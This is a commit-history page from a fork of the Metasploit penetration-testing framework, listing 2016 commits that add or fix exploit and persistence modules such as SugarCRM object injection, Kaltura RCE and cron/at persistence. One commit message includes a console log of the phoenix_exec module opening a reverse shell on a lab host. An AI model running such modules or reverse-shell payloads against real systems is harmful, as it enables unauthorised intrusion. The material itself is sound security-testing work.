adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
41,886 Commits 27 Branches 1,043 Tags
f8a94de6710abe3042a26a9dca38dcccff2c93be
Commit Graph

10172 Commits

Author SHA1 Message Date
Jon Hart 18c54ebb5e Minor rubocop gripe 2016-09-13 20:54:30 -07:00
Jon Hart 15e44e296b Fix cmd execution; use and cleanup temporary files 2016-09-13 20:51:32 -07:00
Jon Hart 972db476ef Implement check for at_persistence 2016-09-13 16:08:49 -07:00
Brent Cook 7352029497 first round of SSL damage fixes 2016-09-13 17:42:31 -05:00
wchen-r7 10efafe44e Land #7306, Update links and add CVE to WebNMS modules 2016-09-13 15:52:27 -05:00
wchen-r7 ed5bbb9885 Land #7284, Add SugarCRM REST PHP Object Injection exploit 2016-09-13 15:46:46 -05:00
wchen-r7 a0095ad809 Check res properly and update Ruby syntax 
If res is nil, it should not be doing res.code
 2016-09-13 15:45:57 -05:00
Pedro Ribeiro 8d4ee3fac6 Forgot the bracket! 2016-09-13 19:01:22 +01:00
Pedro Ribeiro 41bdae4b84 update links and CVE on webnms_file_upload 2016-09-13 18:50:25 +01:00
Jon Hart c69d65c47e Initial commit of at(1) 'persistence' 
Initial inspiration from @h00die's cron module in #7003
 2016-09-13 10:25:13 -07:00
Justin Steven 17bad7bd4f fix popchain 
ERB changed as per <https://github.com/ruby/ruby/commit/e82f4195d4>
which broke the popchain used for code execution.
 2016-09-13 21:25:14 +10:00
nixawk 1ce9aedb97 parenthesis for condition expression 2016-09-13 03:37:47 -05:00
nixawk fd16c1c3b7 Fix issue-7295 2016-09-13 01:32:20 -05:00
aushack 11342356f8 Support LHOST for metasploit behind NAT 2016-09-13 11:23:49 +10:00
Brent Cook a81f351cb3 Land #7274, Remove deprecated modules 2016-09-09 12:01:59 -05:00
Justin Steven 6bafad44f2 drop 'require uri', tweak option text 2016-09-09 20:31:23 +10:00
Justin Steven 0b012c2496 Combine Unix and Windows modules 2016-09-09 20:28:13 +10:00
William Vu 7d44bd5ba4 Clean up module 2016-09-06 23:30:58 -05:00
aushack 015b790295 Added default rport. 2016-09-07 14:24:07 +10:00
catatonic c06ee991ed Adding WiFi pineapple command injection via authenticaiton bypass. 2016-09-06 17:22:25 -07:00
catatonic 8d40dddc17 Adding WiFi pineapple preconfig command injection module. 2016-09-06 17:18:36 -07:00
EgiX df5fdbff41 Add module for KIS-2016-07: SugarCRM REST PHP Object Injection 
This PR contains a module to exploit KIS-2016-07, a PHP Object Injection vulnerability in SugarCRM CE before version 6.5.24 that allows unauthenticated users to execute arbitrary PHP code with the permissions of the webserver. Successful exploitation of this vulnerability should require SugarCRM to be running on PHP before version 5.6.25 or 7.0.10, which fix CVE-2016-7124.
 2016-09-07 01:58:41 +02:00
Quentin Kaiser e4d118108a Trend Micro SafeSync exploit. 2016-09-06 19:33:23 +00:00
William Vu fed2ed444f Remove deprecated modules 
psexec_psh is undeprecated because users have been reporting
idiosyncrasies between it and psexec in the field.
 2016-09-03 12:43:01 -05:00
Justin Steven ea220091ea add metasploit_webui_console_command_execution 
These modules target the Metasploit Community/Express/Pro Web UI on
Unix and Windows via the diagnostic console feature
 2016-09-03 09:12:09 +10:00
Mehmet Ince ba6c2117cf Fix msftidy issues 2016-09-02 18:18:43 +03:00
Mehmet Ince 144fb22c32 Add Kaltura PHP Remote Code Execution module 2016-09-02 18:09:53 +03:00
Jan Mitchell 411689aa44 Adding changes to Samba exploit to target MIPSBE (this is for OpenWRT on a router 2016-09-01 10:05:13 +01:00
wchen-r7 445a43bd97 Trim the fat 2016-08-30 15:56:51 -05:00
wchen-r7 1b505b9b67 Fix #7247, Fix GlassFish on Windows targets 
Fix #7247
 2016-08-30 15:46:08 -05:00
William Vu 7a412031e5 Convert phoenix_exec to ARCH_PHP 2016-08-29 14:14:22 -05:00
William Vu 43a9b2fa26 Fix missing return 
My bad.
 2016-08-29 14:13:18 -05:00
William Vu d50a6408ea Fix missed Twitter handle 2016-08-29 13:46:26 -05:00
William Vu f8fa090ec0 Fix one more missed comma 2016-08-29 13:40:55 -05:00
William Vu 53516d3323 Fix #7220, phoenix_exec module cleanup 2016-08-29 13:28:15 -05:00
h00die 748c959cba forgot to save before PR 2016-08-25 21:45:17 -04:00
h00die 5dff01625d working code 2016-08-25 21:32:25 -04:00
Pearce Barry 226ded8d7e Land #6921, Support basic and form auth at the same time 2016-08-25 16:31:26 -05:00
h00die f2e2cb6a5e cant transfer file 2016-08-21 19:42:29 -04:00
h00die 6306fa5aa5 Per discussion in #7195, trying a different route. Currently this compiles, then passes the binary. However, there isn't a reliable binary transfer method at this point, so the rewrite from this point will be to transfer the ascii file, then compile on system (gcc is installed by default I believe) 2016-08-21 19:16:04 -04:00
Jay Turla ee89b20ab7 remove 'BadChars' 2016-08-19 23:49:11 +08:00
Jay Turla e3d1f8e97b Updated the description 2016-08-19 22:22:56 +08:00
Jay Turla 5a4f0cf72f run msftidy 2016-08-19 21:56:02 +08:00
Jay Turla c66ea5ff8f Correcting the date based on the EDB 2016-08-19 21:47:57 +08:00
Jay Turla d4c82868de Add Phoenix Exploit Kit Remote Code Execution 
This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit Remote Code Execution via the geoip.php. The Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which then silently installs malware.

```
msf exploit(phoenix_exec) > show options

Module options (exploit/multi/http/phoenix_exec):

   Name       Current Setting              Required  Description
   ----       ---------------              --------  -----------
   Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.52.128               yes       The target address
   RPORT      80                           yes       The target port
   SSL        false                        no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /Phoenix/includes/geoip.php  yes       The path of geoip.php which is vulnerable to RCE
   VHOST                                   no        HTTP server virtual host


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.52.129   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Phoenix Exploit Kit / Unix


msf exploit(phoenix_exec) > check
[+] 192.168.52.128:80 The target is vulnerable.
msf exploit(phoenix_exec) > exploit

[*] Started reverse TCP double handler on 192.168.52.129:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo RZpbBEP77nS8Dvm4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "RZpbBEP77nS8Dvm4\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 5 opened (192.168.52.129:4444 -> 192.168.52.128:51748) at 2016-08-19 09:29:22 -0400

uname -a
Linux ubuntu 4.4.0-28-generic #47-Ubuntu SMP Fri Jun 24 10:08:35 UTC 2016 i686 i686 i686 GNU/Linux
```
 2016-08-19 21:29:55 +08:00
William Webb 3eb3c5afa2 Land #7215, Fix drupal_coder_exec bugs #7215 2016-08-18 13:43:23 -05:00
William Vu 2b6576b038 Land #7012, Linux service persistence module 2016-08-17 22:45:35 -05:00
William Vu c64d91457f Land #7003, cron/crontab persistence module 2016-08-17 22:45:16 -05:00
William Vu 4228868c29 Clean up after yourself 
Can't use FileDropper. :(
 2016-08-16 23:09:14 -05:00
William Vu 1f63f8f45b Don't override payload 
pl is a cheap replacement.
 2016-08-16 23:08:53 -05:00